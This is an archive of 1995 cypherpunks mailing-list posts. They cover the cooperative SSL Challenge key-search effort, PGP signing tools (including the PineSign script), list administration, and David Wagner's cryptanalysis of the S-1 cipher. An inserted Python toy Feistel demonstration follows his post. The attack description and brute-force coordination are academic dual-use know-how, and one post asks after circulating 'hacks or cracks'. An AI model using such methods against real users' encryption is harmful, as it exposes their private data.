     factor in the challenge release. That way, any late entries can
     automagically be inserted into the keyspace, by squeezing everyone
     according to the final total of available_mips.

  Once the proverbial clock is running, there should be no need to
discuss who will do what. That is what the huddle is for. Or, to string
along the analogy, I guess Steve Young should just go up to the line,
take the ball from center, and then give hand signals to Jerry Rice
while a 300-pound defensive lineman is zeroing in on him, because the
linemen are standing around wondering whom to block.

  Geez. It would be better not to even have a damned keyserver at all,
but to just have everybody pick a random start location, than to do it
this way.

</rant>


 * A child said "Mommy, why is the man with the crown naked?"

---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Fri, 25 Aug 95 14:39:28 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <"swan.cl.cam.:068530:950825160033"@cl.cam.ac.uk>
Message-ID: <199508252137.RAA18903@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


> [[ PERL gurus out there: how can I avoid the "sh -c" process in
> 	$out = `cmd -a 'arg 1'`;
> ]]
> 

open(CMD, "-|") || exec 'cmd', '-a', 'arg 1';
$out = <CMD>;  ## Gets one line
close(CMD);

Use

$out = join('',<CMD>);

instead of the second line above to get the whole output at once.

---------.. ._ _.------------

Ian Goldberg  University of Waterloo Computer Science Club
iagoldberg@csclub.uwaterloo.ca

unsigned bar(unsigned a){return a?bar(a<<1)<<1|a>a<<1>>1:1>>1;}



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alvin Brattli <alvin@phys.uit.no>
Date: Fri, 25 Aug 95 08:49:07 PDT
To: cypherpunks@toad.com
Subject: brclient for SGI?
Message-ID: <199508251548.RAA26206@geronimo.uit.no>
MIME-Version: 1.0
Content-Type: text/plain



Do any of you other bruters have a copy of the latest brclient
that will actually work on an SGI Challenge with IRIX 5.3?
If you do, please pretty please mail it to me, as my 'biggie',
an 8 processor SGI Challenge is completely idle...


aLViN
--
| Alvin Brattli <alvin@phys.uit.no>         |
| ----------------------------------------- |
| GOD MY HEAD HURTS. Too much thinking      |
| and not enough brain cells. -- Clint Ruin |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 25 Aug 95 19:06:35 PDT
To: cypherpunks@toad.com
Subject: Re: Billing for internet usage
Message-ID: <ac64304b010210044008@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 5:06 PM 8/1/95, David G. Koontz wrote:
....
>One way would be to perform cooperative billing balances between nodes,
>and allow each node to 'bill upward'.   This means that any two machines
>are more interested in their relative balance than how much money they
>are really spending.   There are some interesting problems of trust and
>reliability, that might be solved through the use of digital money.
....
Ideas like these are discussed in my "Digital Silk Road" paper which is now
accessible as "http://www.webcom.com/~agorics/dsr.html". There may soon
be a PostScript version available.

These are the ideas that I presented at a Cypherpunks meeting about a year ago.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh (Hugh Daniel)
Date: Fri, 25 Aug 95 18:45:28 PDT
To: cypherpunks@toad.com
Subject: ADMIN:  You might not be on the list anymore!
Message-ID: <9508260145.AA01411@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  I want to warn you folks about how the list is run, just so you
don't think that evil is afoot on toad.com.
  Recently the bounce messages for cypherpunks got to be over 80 megs
large, largely due to my being busy.  When I went to clean them and
the offending messages out (only 38 addresses needed to be culled) I
found a lot of bounces from the likes of AOL and MCI that were "user
XXX's mail box is full..." bounces.
  In the past I tried to ignore these messages as it was clear that the
mail boxes would get emptied at some point.  Now I have seen these
messages from the same address for weeks, and that, combined with the
number of hours it takes to cull this crud from the list, has pushed me
into a new policy.
  I am now deleting (almost) all addresses from the list that
generate bounce messages.  If you stop getting cypherpunks email the
FIRST thing to do is ask the majordomo@toad.com mailbot if you are
still on the list; this might look like:

	To: majordomo@toad.com
	Subject:
	--text follows this line--
	which yourlogin@yourhost.dom

  If you are NOT on the list, just subscribe again and leave it at
that.  Please note that many of the bounce messages came from email to
(local) news group gateways, and while I try to send warning messages,
it would be better if folks maintaining such gateways made sure that
bounce messages went to the local maintainers instead of me.

  Enjoy the list, and keep it on topic folks!

		||ugh Daniel
		Majordomo Potty Trainer
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Fri, 25 Aug 95 09:52:18 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
In-Reply-To: <9508251143.AA15702@all.net>
Message-ID: <m0sm205-000PZjC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawagner@tucson.Princeton.EDU (David A. Wagner)
Date: Fri, 25 Aug 95 12:26:54 PDT
To: sci-crypt-research@uunet.uu.net
Subject: Cryptanalysis of S-1
Message-ID: <41l6u3$852@cnn.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I just got back from vacation in time to see the brouhaha over S-1.
My, my.  So I'll describe an attack on S-1 which takes 2^32 known
plaintexts and 2^64 operations, assuming that F, G, clear_family,
and cipher_family are known (but arbitrary).  Tradeoffs are possible:
a similar attack breaks S-1 with 2^48 known plaintexts and 2^48 operations.

This adds weight to the hypothesis that S-1 is a hoax (assuming that
the NSA was trying to design a strong cipher!)...

I should point out that this attack works for an arbitrary number
of rounds.  It shows that increasing the number of rounds will never
make S-1 secure.  To fix S-1, the key schedule must be repaired.




Anyhow, here's the attack.  Several people have noted that the
S-1 round keys repeat every 5 rounds.  I'll take advantage of this
with an attack reminiscent of related-key techniques (but I don't
need any related keys, mind you!).

If P is a known plaintext, let P_i denote the intermediate block
after i rounds.  I'm going to look for a pair of matching plaintexts
P,Q: a pair for which P_5 = Q_0.  Then we'll have P_{5+j} = Q_j
for all j.  Pictorially:

	P_0
	P_1
	P_2
	P_3
	P_4
	P_5	Q_0
	P_6	Q_1
	...	...
	P_31	Q_26
	P_32	Q_27
		Q_28
		Q_29
		Q_30
		Q_31
		Q_32
	
The birthday paradox says that with 2^32 known plaintexts, there
should be a matching pair P,Q.  If I can recognize it, I can
exploit it as follows.  Note that (P_0,Q_0) and (P_32,Q_32) are
two known plaintext-ciphertext pairs for 5-round S-1.  These two
known plaintexts for 5-round S-1 are enough to find the 5 round
subkeys by standard methods (since we know the inputs and outputs
to almost all the F boxes in these two examples).

Thus, each pair P,Q will suggest one key value, and the right
(matching) pair will suggest the correct key value (which can be
easily recognized with one trial decryption).  I don't know how
to recognize matching pairs directly, but I can try all 2^32 * 2^32
possible pairs, and I'm guaranteed to find the matching plaintext
pair if there is one after 2^64 trial decryptions.


That's the basic attack.  Here's a sketch of how to trade off
known plaintexts for time.  I'd really like to be able to detect
matching pairs easily, because then I'd be able to use a hash
table (or sorted list) to find a matching pair more efficiently.

So I'll note that I can detect matching pairs pretty accurately
if P,Q are in a particular form.  I'll construct an oracle which
can quickly tell if two plaintext-ciphertext pairs (X,Y) (X',Y')
for 5-round S-1 were enciphered with the same key, if they're in
a special form.

Let A,A' be the 32 bits from X,X' entering the F boxes in round 2;
let B,B' be the 16 bits output from the F boxes in round 2;
let C,D,C',D' be the 16 bits affected by the F boxes in round 2
from X,Y,X',Y' -- so that

	D = C ^ B = C ^ f(A ^ K_2)
	D' = C' ^ B' = C' ^ f(A' ^ K'_2).

If K_2 = K'_2 and A = A', then D ^ C should equal D' ^ C'.
So this is how I'll construct the oracle: it insists that (X,Y)
(X',Y') be of a form so that A = A', and it reports that (X,Y)
(X',Y') were enciphered with the same key when D ^ C = D' ^ C'.
The oracle will always answer correctly if they were enciphered
with the same key, and will answer incorrectly 2^{-16} of the
time when they were enciphered with different keys.

So now we are considering (X,Y) = (P_0,P_5) = (P_0,Q_0) and
(X',Y') = (Q_27,Q_32) = (P_32,Q_32).  The oracle's precondition
means that 32 bits of P_0 equal a corresponding 32 bits of P_32.

The tradeoff attack follows from this.  Get 2^48 known plaintexts.
Consider only those known plaintext-ciphertext pairs (P_0,P_32)
which meet the 32 bit oracle precondition as possibilities for P.
There will be 2^16 possibilities for P.  Let Q range over all 2^48
possibilities.  Then we expect there to be some right matching pair
P,Q: the oracle is guaranteed to detect it, and also another 2^48
wrong pairs.  Each possible pair P,Q will suggest a key value,
so the wrong pairs can be filtered out with a total of 2^48 trial
encryptions, leaving only the right pair and the right key value.

This would seem to require 2^16 * 2^48 oracle computations since
there are 2^16 values for P and 2^48 possibilities for Q.  But
wait: the oracle can be implemented more efficiently as a table
lookup.  Store all 2^16 possibilities for P in a lookup table,
keyed on the 16 bit value D^C used by the oracle.  For each Q,
calculate the 16 bit value D' ^ C' and search in the table for
a matching D ^ C value (which gives you a possible matching pair
P,Q).

This technique requires a total of 2^48 table lookups, 2^48 trial
decryptions, 2^16 space, and 2^48 known plaintexts.  Further tradeoffs
between # of known plaintexts and time appear to be possible...

I've ignored the issue of the G box throughout.  Actually, it does
change the number a little bit -- but just by random luck, the two
G box outputs should match 1 in 2^2 times, so we only need to increase
the complexity of this attack by about 2^2 to account for the G box.
The G box didn't add much strength.

-------------------------------------------------------------------------------
David Wagner                                             dawagner@princeton.edu
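
Added example (not part of David Wagner's post, and not S-1): a toy Feistel
cipher in Python whose round keys repeat every 5 rounds, used as a
key-schedule check that shows P_{5+j} = Q_j for any number of rounds. The
round function, block size, sample subkeys and the non-repeating schedule
shown as a repair are all assumptions made for this illustration.

```python
"""Period-5 key schedule in a toy Feistel network (added example)."""
import hashlib

PERIOD = 5  # from the post: round keys repeat every 5 rounds
KEYS = [0x1A2B, 0x3C4D, 0x5E6F, 0x7081, 0x92A3]  # constructed sample subkeys


def periodic_key(i):
    """Flawed schedule: round i reuses KEYS[i mod 5]."""
    return KEYS[i % PERIOD]


def unique_key(i):
    """One possible repair (an assumption): derive a distinct subkey for
    every round from the key material and the round index."""
    material = b"".join(k.to_bytes(2, "big") for k in KEYS)
    digest = hashlib.sha256(material + i.to_bytes(4, "big")).digest()
    return int.from_bytes(digest[:2], "big")


def f(half, subkey):
    """Arbitrary keyed round function on 16-bit halves (toy stand-in)."""
    data = (half ^ subkey).to_bytes(2, "big")
    return int.from_bytes(hashlib.sha256(data).digest()[:2], "big")


def trace(block, schedule, total_rounds, first=0):
    """Return the intermediate blocks X_0 .. X_R of a Feistel network in
    which the round numbered i uses schedule(i), starting at i = first."""
    left, right = block
    states = [(left, right)]
    for i in range(first, first + total_rounds):
        left, right = right, left ^ f(right, schedule(i))
        states.append((left, right))
    return states


def slide_check(p, schedule, total_rounds):
    """Build Q with Q_0 = P_5 and return (aligned, five_round_pair):

    aligned         -- P_{5+j} == Q_j for every j up to R - 5
    five_round_pair -- Q_R is P_R pushed through only 5 further rounds,
                       i.e. (P_R, Q_R) is a 5-round input/output pair
    """
    P = trace(p, schedule, total_rounds)
    Q = trace(P[PERIOD], schedule, total_rounds)
    aligned = all(P[PERIOD + j] == Q[j]
                  for j in range(total_rounds - PERIOD + 1))
    tail = trace(P[total_rounds], schedule, PERIOD,
                 first=total_rounds - PERIOD)
    return aligned, tail[-1] == Q[total_rounds]


if __name__ == "__main__":
    p = (0x0123, 0x4567)  # constructed sample plaintext block
    for r in (32, 64, 1000):
        print(r, "rounds, periodic keys:", slide_check(p, periodic_key, r))
    print(32, "rounds, unique keys:  ", slide_check(p, unique_key, 32))
```

With the periodic schedule both checks hold at 32, 64 and 1000 rounds, so
extra rounds never remove the 5-round relation; with per-round subkeys the
alignment is lost after the first round.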




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ai05@solo.pipex.com (News Department, New Scientist)
Date: Sat, 26 Aug 95 04:38:16 PDT
Subject: Microsoft Network
Message-ID: <41l7se$hkc_001@dial.pipex.com>
MIME-Version: 1.0
Content-Type: text/plain


This may be the wrong place to pose this question but...
Does anyone have any experience of using the nascent Microsoft Network? Early 
reports from beta testers say it could be a hacker's delight due to the use it 
makes of objects and such like.
Any opinions, or does anyone know of any hacks or cracks circulating yet?
Thanks in advance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 11:37:57 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508251723.AA18139@cantina.verity.com>
Message-ID: <"swan.cl.cam.:133180:950825183721"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> PLEASE ensure that you are using a brclient of at least 0.14
>> ("grep comment.inffo brclient" to discover what you are using)
>> You can update brclient while brloop is running.
>> Some people are still running old versions, and this is hammering the
>> server.
>> 
>> It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").
> Unfortunately the web page under "Socket based key doler" points 
> at brclient 0.13 and brloop 0.04.  Could you fix this please:)

I had a similar report before, and it turned out to be an overzealous WWW 
"cache" :-((

HOWEVER: there is now a new brclient 0.17 which should go faster than pre 0.16 
over "slow" links, but should also work over "fast" links (which 0.16 
sometimes did not).  SO: all 0.16 users should upgrade, just in case the link 
goes fast!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Tardieu <sam@inf.enst.fr>
Date: Fri, 25 Aug 95 10:52:08 PDT
To: cypherpunks@toad.com
Subject: Challenge / Anything working ?
Message-ID: <"uAvWc.0.he4.GoWFm"@gargantua>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<sam@manon:~>telnet sksp.brute.cl.cam.ac.uk 19957
Trying 128.232.0.90...
(then nothing)

Isn't it the right server/port ?

  Sam
- --
"La cervelle des petits enfants, ca doit avoir comme un petit gout de noisette"
                                                       Charles Baudelaire

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMD4Mi4FdzKExeYBpAQHaMgP+IgjU/SjM6+9rz0sM191xLLrEuCcdeZUL
dVkP2VDTCCQqVCH5PyWWvC1O4bunQVgXaW35g6xmDKnnAiALW3UVRsq0QpiBhcrf
8lKZm6ASZWU8TSEoLrmf/kLvqygW9t72D+ktcXokiLe3OvT6Bs41DhHo8c/3go1u
2G/hylhLV9w=
=Yz3+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 25 Aug 95 19:12:45 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
Message-ID: <199508260212.UAA27830@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I have PGP installed on my pc and if I want to 
> use it, I can save the message in ascii, then upload it to the server 
> where I have my Internet account, then mail it.


I use PGP on every outgoing message and about 20% of incoming messages.  And
I send/receive a *lot* of messages.  No way I would be able to do a process 
like the above on my mail.


In a few weeks I will be able to get mail on my home computer, but most
(80%?) Internet users will still not have that luxury.


>  maybe not entirely 
> transparent, but at least it seems to me that the convenience of running 
> it on the server with something like Mr. Wilcox's BAP is not worth the 
> added risk.


In my opinion it *is* worth the risk.  I believe that having "BEGIN PGP
SIGNED MESSAGE" in your posts and e-mail is a social good (raising public
awareness of/acceptance of PGP) which is more important than actually
protecting my e-mail from spying/forgery.


>  Besides, how often do you need to use it?  


Public awareness/acceptance, traffic analysis, the "electronic envelope" 
analogy...


If you don't use it, it's not doing any good at all.


Regards,

Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD6C7/WZSllhfG25AQFQ7gP9EX48Bw6mZ5WJYR+4j78oPUL7++Irz39i
b6EbU8ZWUia1AEqSVLmKibIE4JOBejZKzSCCF4OrE7j+BCT1B5hLbIrUZzNNHDQk
pXbfLo51FyIsR4SlCYtWdsMUiAI08ACOAAxtab/3uC2DEO7UB/9A+xALPGNFQWdz
oRnku9NOOY0=
=0uru
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 25 Aug 95 17:11:15 PDT
To: cypherpunks@toad.com
Subject: Progress so far
Message-ID: <9508260011.AA28611@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, we're now about 30 hours into the crack, and here are some
very rough stats.

We've swept a bit over  1/4 of the keyspace. Only 60% of requests have 
been ACKed so far - PLEASE check to make sure your acks have
been recorded.

The largest segments completed are a 128 (mine), and 4 100's
(3 are mine :-) Over 9000 segments have been swept in 3-segment
chunks, by far the most popular size.

I count people from uk, at, se, ee, fr, ie, kr, nl, de, no, au, za, nz, 
fi, ca, be, is, and us, by a casual inspection - I'm sure there are more.

It's pretty clear that the server is the bottleneck, though also looks 
like some people are biting off more than they can chew. I would
have probably swept another couple hundred today if I could have
obtained the key space.

Since a lot of sweepers are not on the cpunk list, notices of
updates and progress would be well put in the /brute/ page.

I'm going away for a week and a half's vacation. I'll try to watch for 
results in sci.crypt, but I probably won't see the cpunk list until I'm 
back.


 Good luck! 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 25 Aug 95 20:09:03 PDT
To: "Robert A. Hayden" <hugh@toad.com>
Subject: Re: ADMIN: You might not be on the list anymore!
Message-ID: <ac63df1c03021004050c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:14 AM 8/26/95, Robert A. Hayden wrote:

>I administrate several mailing lists.  Bounces as of late have gotten so
>bad, especially from AOL, C$erv, etc (and I expect soon from MSN.COM)
>that I also just nuke the person out of hand.  It's better in the long
>run :-)

I agree. Kill them all. God will know his own.


--Tim the Impaler

(I'm seeing bounces on all Compuserve addresses for the simple Cypherpunks
Santa Cruz I administer manually.)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Fri, 25 Aug 95 19:28:02 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.LNX.3.91.950825200849.7881B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 25 Aug 1995, P.J. Ponder wrote:

> Date: Fri, 25 Aug 1995 21:52:47 +0100
> From: P.J. Ponder <ponder@wane-leon-mail.scri.fsu.edu>
> To: hfarkas@ims.advantis.com
> Cc: cypherpunks@toad.com
> Subject: Auto-pgp for pine/elm/tin (fwd)
> 
> 
> In Garfinkel's book, he talks about the risks of running PGP on a 
> multiuser system where others (sys. admins, eg) have higher levels of 
> authority than you do.  I have PGP installed on my pc and if I want to 
> use it, I can save the message in ascii, then upload it to the server 
> where I have my Internet account, then mail it.  maybe not entirely 
> transparent, but at least it seems to me that the convenience of running 
> it on the server with something like Mr. Wilcox's BAP is not worth the 
> added risk.  Besides, how often do you need to use it?  
> --
> pjp

the risks etc of using pgp on multiuser platforms are well known. 

i'd say it's better to have a pgp signed mesg than an unsigned one.

if you post a lot, or mail a lot, that's a lot of mesgs to sign.
finding a tool to do this more easily than using pgp through the shell
interface is 'a good thing'.

given that, here are some args for signing on a multiuser platform.

often, people (me included) choose to use a separate 'weak' key for 
these purposes.  it's always nice to have some sort of indication that 
that is what the key is for.  i had a key with 'INSECURE KEY!!' tagged 
on the end of my userid.  i had another for secure communications.

now, you can't stop some sysop type person from doing whatever to you.
that's the way it goes.  but, if you've got a really malicious sysop,
they could just spoof you to the world, including making up a key
supposedly from you.  if they posted enough crap using that key people
would begin to think that they are really you or that one of you is
lying and to hell with both of you.  this sort of denial of service
attack is an unlikely event (unlikely for a sysop to do - someone else
is a diff matter).

finally, independent of multiuser platforms, the signing utilities are
quite useful for people like me who have their own personal unix box
on the net.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD6GjE3Qo/lG0AH5AQHazAP/ToRRiftaXDspBAnECzoM1ZexhqKb8Ou/
uxSljS/w3h9yz7+j6bJIbak1CI2JFrTneyj6jKsW/2wCV/p65F+5dvD2a2VUCJ6u
+93zmFHiMS0XhCl3lLutKKlcrZkXC1P1qvY7ozFYoJ5PQ7rqQGfoxUuPisGJ5gJm
XH/kkQSIuis=
=VpN7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Fri, 25 Aug 95 17:54:34 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: I told you so....
In-Reply-To: <8AFD417.000300036F.uuout@famend.com>
Message-ID: <199508260054.UAA26805@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


MONTY HARDER writes:
 >   Geez. It would be better not to even have a damned keyserver at all,
 > but to just have everybody pick a random start location, than to do it
 > this way.

I think this would make an interesting comparison versus the present
system. Maybe the next challenge...?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 25 Aug 95 19:14:28 PDT
To: Hugh Daniel <hugh@toad.com>
Subject: Re: ADMIN: You might not be on the list anymore!
In-Reply-To: <9508260145.AA01411@toad.com>
Message-ID: <Pine.ULT.3.91.950825211315.13100C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I administrate several mailing lists.  Bounces as of late have gotten so 
bad, especially from AOL, C$erv, etc (and I expect soon from MSN.COM) 
that I also just nuke the person out of hand.  It's better in the long 
run :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMD5nbDokqlyVGmCFAQE5bAP/XP99zqzhOK/5o2lflO5AY/ecAEoQBI0A
Nxj1wTHtWMb5mjuW2zruHSDn/Z2Kk/hQ7aEpEXaLhNtpqdBYe/PnJl/BR84abnT+
JaNP018cFx2VHbAkroQ8XdSYWRQFbgqXbU0z4Ju47oajNHoTMqzEt2ZiR/2pwYBi
XFTtjjjQcU4=
=dPYd
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 25 Aug 95 19:17:18 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PINESIGN 2.2 (re: PGP for Pine)
Message-ID: <Pine.ULT.3.91.950825211443.13100D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been out of town this week, so I couldn't respond in a timely manner 
(and I returned to 500+ pieces of cypherpunks email :-)

I'm appending a copy of PineSign 2.2, which is the most recent version of 
the PineSign program.  It doesn't do any encryption, it simply allows for 
easy signing of messages composed with pine (and maybe other mailers as 
well).  If you want to encrypt and such, I'd recommend mkpgp if you can 
find it or perhaps autopgp does it (not sure).

I also have a version of a similar program for Tin available on my home 
page, or I can post it if there is interest.

=====

#!/bin/sh

# PINESIGN v2.2
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.91 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# In addition to PGP and the editor you define, PineSign also will use the
# following programs:
#       cat
#	clear
#       echo
#	mv
#
# Execute the command "chmod 700 <path/to/pinesign>"
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature-pine in your $HOME directory.  
# Default editor is pico -z -t.
#
# Define SIGPATH=/dev/null if you do not have an ASCII signature to
# append.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# Next, define the ECHOTYPE variable.  Some systems do not allow the use 
# of the echo -n command.  If your system doesn't like echo -n, uncomment 
# the plain echo variable and comment out (put a "#" in front of it) the 
# echo -n command.

ECHOTYPE='echo -n'
#ECHOTYPE='echo'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file will 
# be appended to your message.  If you type anything else, your message 
# will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that you define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

# Run the editor on the message file Pine passes as $1.  PINEEDITOR is left
# unquoted on purpose so that its options (-z -t) are split into arguments.
$PINEEDITOR "$1"

clear
$ECHOTYPE "Would you like to add your ASCII signature to this message? [y] " 
read SIG
echo " "
$ECHOTYPE "Would you like to sign this message with your PGP signature? [y] "
read PGP

# y, Y or a bare return all mean "yes"; anything else skips the step.
case "$PGP" in
	y|Y|"")
		# Clearsign the message, then replace it with the signed copy.
		pgp -sat +comment="PGP Signed with PineSign 2.2" +clearsig=ON "$1"
		mv "$1.asc" "$1"
		;;
esac

# The text signature is appended after the PGP signature block.
case "$SIG" in
	y|Y|"")
		echo " " >> "$1"
		cat "$SIGPATH" >> "$1"
		;;
esac

# REVISION HISTORY

# 1.0 -	Original Release
# 2.0 - Added the ability to select whether or not to add the ASCII signature
# 2.1 - Forgot to add the +clearsig=on parameter to the PGP statements.  
#	OOPS!
# 2.2 - CURRENT RELEASE
#	After receiving complaints about some systems not being able to 
#	handle the -n parameter for echo, added in the ECHOTYPE variable.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMD5oFzokqlyVGmCFAQHW0AQAuw7BVRcAKGfi7Bk53KBoQnYPO0H+3Ubn
aMCiOx9lWU2CDCtBxYM3TyMtNCIrcLt9YV5kFqSLXAN4kpe3s+p2wko3PdL9JyZg
63h1Wl7HT7t/Q+yYhYrI3kazrHJj9Bhv/AZTVhicEHV89z0SadXq7dZKrIQX6H3t
0aVz5mmZ5+E=
=Tfxw
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
